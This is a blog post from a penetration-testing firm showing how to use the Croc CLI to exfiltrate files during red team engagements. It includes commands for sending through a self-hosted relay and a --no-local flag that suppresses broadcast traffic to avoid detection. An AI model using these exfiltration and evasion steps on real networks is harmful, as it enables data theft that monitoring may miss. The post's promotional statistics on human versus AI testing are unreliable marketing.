The Exploit

Notes from the Front Lines of Penetration Testing

Cool Tools Series: Croc for Secure Data Exfiltration

Posted on

Categories: ,
Cool Tools Series: Croc for Secure Data Exfiltration

Written by

Nathan Anderson

Today, I’d like to introduce a CLI tool that I use on red team engagements to securely exfiltrate data. Croc is a file transfer tool that provides end-to-end encryption, works across multiple platforms, and allows a direct file transfer or one relayed over a web server.

Croc is a great tool to exfiltrate data from a site, as the traffic is fully encrypted and there isn’t a size limit when using a private relay. I have used it to send files up wards of 6.5GB without any issues.

It’s a very straightforward tool to use. There are a couple of things I would recommend doing before using it for a red team engagement, and we will get into why.

Sending Files

Sending a file is as simple as this:

croc send {FILENAME}

On the receiving end, you simply type Croc and then enter the receiving code when it prompts you.

Sending files like this uses the Croc relay cloud servers. The files are encrypted until the data lands on the receiving PC. It is truly that simple.

Sending and receiving a file using croc.

Hosting Your Own Croc Relay

For an added layer of security, you can host your own Croc relay using a publicly accessible system. This ensures that you control the data from one end to the other, which is always preferred.

After installing Croc from its Git repository, https://github.com/schollz/croc, we can do this by running the following command on our cloud server:

croc relay

And adding the following on both the sending and receiving nodes:

--relay {PUBLIC IP}:{PORT NUMBER} 

Here you can see the sending node, receiving node, and the relay server:

Using croc relay

Keeping Things Quiet

Now, in order to use this on a red team, we must set a couple of flags. Croc naturally prefers performing local relaying over cloud relays. Due to this, it sends a large amount of broadcast UDP traffic on the subnet it’s on. It does this to see if the receiving node is on the same subnet as the sending node. However, this deluge of broadcast traffic also creates a definitive Indication of Compromise (IOC) apparent to anything that might be monitoring the network.

Broadcast traffic from croc that we want to bypass

Using the correct flags, you can tell Croc not to use a local relay and instead only to use a cloud relay. With the right combination of flags, you can use your private relay and disable local relaying, keeping things much quieter as far as detection is concerned.

croc --relay {PUBLIC IP}:{PORT NUMBER} send --no-local {FILENAME}

Croc with local relaying disabled

In Conclusion

Croc is a simple, easy-to-use tool that I find useful on penetration testing and red team engagements. Thanks for reading, and if you found these tips useful, take a look at other blogs in our technical how-to series.

Written by

Nathan Anderson

Nathan has been working in Information Technology and Cybersecurity for nine years and has competed in several Capture The Flag (CTFs) events. He holds the Offensive Security Certified Professional (OSCP) certification and, for the past five years, has enjoyed using his skills in the Penetration Testing and Network Security realms. In his off time, when he’s not taking part in a CTF, security research, or working on a new IoT project, he enjoys building furniture and hiking.

Nathan Anderson
Nathan has been working in Information Technology and Cybersecurity for nine years and has competed in several Capture The Flag (CTFs) events. He holds the Offensive Security Certified Professional (OSCP) certification and, for the past five years, has enjoyed using his skills in the Penetration Testing and Network Security realms. In his off time, when he’s not taking part in a CTF, security research, or working on a new IoT project, he enjoys building furniture and hiking.

Also by Nathan Anderson
  • Cool Tools Series: How MSFvenom Powers Penetration Testing
  • Nathan Anderson, Lead Penetration Tester

Human Vs AI Pentesting

While AI tools offer speed in detecting known vulnerabilities, they fall short with 20-35% false positives and only 50-65% success on complex threats like business logic flaws, as per mainstream reports from Verizon and OWASP. Human penetration testers at Raxis deliver 85-90% detection rates, precise prioritization, and ethical adaptability, ensuring your organization stays ahead of real-world attacks.

Learn More

Partner With Raxis

Partnering with Raxis empowers your business with elite penetration testing services, competitive reseller pricing, and recurring revenue opportunities, all backed by a proven track record of excellence and a commitment to staying ahead of evolving cybersecurity threats.

Learn More

Penetration Testing

Tailored, expert-led penetration testing services that uncovers hidden vulnerabilities using real-world hacker techniques, providing actionable insights to strengthen your defenses and protect against sophisticated cyber threats.

Learn More

Read More From The Exploit

  • PSE & Red Team Series: The Power of Grip to Enhance the Under-Door Tool

    PSE & Red Team Series: The Power of Grip to Enhance the Under-Door Tool
    By Brad Herring • August 12, 2025
    Read More
  • Wireless Series: Using Wifite to Capture and Crack a WPA2 Pre-Shared Key

    Wireless Series: Using Wifite to Capture and Crack a WPA2 Pre-Shared Key for Penetration Testing
    By Scottie Cole • June 17, 2025
    Read More
  • Jailbreak Journey: Transforming an iPad for Mobile App Penetration Testing

    Jailbreak Journey: Transforming an iPad for Mobile App Penetration Testing
    By Jason Taylor • June 3, 2025
    Read More

Ready To See Raxis One In Action?

See how we transform traditional pen testing into interactive security intelligence that keeps you informed every step of the way. From real-time attack progression to detailed remediation guidance, Raxis One gives you unprecedented visibility into your security posture as it’s being tested.

Schedule a Demo